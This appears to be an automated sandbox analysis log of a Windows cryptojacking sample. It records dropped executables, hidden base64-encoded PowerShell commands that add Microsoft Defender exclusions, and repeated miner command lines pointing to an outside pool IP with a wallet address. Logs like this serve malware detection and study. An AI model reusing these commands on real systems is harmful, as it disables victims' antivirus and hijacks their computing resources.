Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: e2kLb2J2Y7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Key.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: e2kLb2J2Y7.exe ReversingLabs: Detection: 57%
Source: e2kLb2J2Y7.exe Virustotal: Detection: 63%
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe File read: C:\Users\user\Desktop\e2kLb2J2Y7.exe Jump to behavior
Source: e2kLb2J2Y7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\e2kLb2J2Y7.exe C:\Users\user\Desktop\e2kLb2J2Y7.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\xddtyli.exe C:\Users\user\AppData\Local\Temp\xddtyli.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: unknown Process created: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor